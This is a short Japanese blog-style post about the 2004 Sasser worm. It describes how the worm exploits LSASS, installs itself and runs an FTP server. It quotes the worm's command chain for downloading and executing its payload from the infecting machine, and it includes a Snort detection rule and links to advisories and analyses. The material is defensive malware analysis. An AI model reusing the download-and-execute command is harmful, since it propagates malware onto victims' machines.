LSASSの脆弱性を攻撃し、9996番ポートでシェルを実行。以下のコマンドを実行してランダム数字_up.exeというファイルを取得。avserve.exeとして%WINDIR% にインストール。レジストリに実行のキーを追加。5554ポートでFTPサーバとして動く。

echo off&echo open [infecting machine's IP] 5554>>cmd.ftp&echo 
anonymous>>cmd.ftp&echo user&echo bin>>cmd.ftp&echo get [rand]_up.
exe>>cmd.ftp&echo bye>>cmd.ftp&echo on&ftp -s:cmd.ftp&[rand]i_up.
exe&echo off&del cmd.ftp&echo on

SANS ISC 5/1にはsnortのsigも上がっています。up.exeを引っかけるようですね（今勉強中）

alert tcp any any -> $HOME_NET 9996 ( msg: "Sasser Transfer up.exe";
 content: "|5F75702E657865|"; depth: 250; flags: A+; classtype:
misc-activity; sid: 1000000; rev: 1;)

• W32.Sasser.worm ウイルスの発生について(5/2)(@Police)
• Sasser ワームについてのお知らせ(マイクロソフト)
• Microsoft LSASS Sasser ワームの拡散(ISSKK)
• MS04-011 LSASRV Exploit; Sasser Worm Update: Sasser.b(SANS ISC 5/1)
• -UPDATE- Sasser Worm , Week in Review; LSASS Exploit Analysis; SANSFIRE 2004(SANS ISC 4/30)
• Sasser Worm Analysis(lurhq.com)
• Sasser AntiVirus Vendorsへのまとめ(secunia.com)

追記：
eEye からSasserスキャナーとAnalysisリリース

• Retina Sasser Audit Tool from eEye Digital Security(eEey)
• Sasser Worm Technical Analysis(eEey)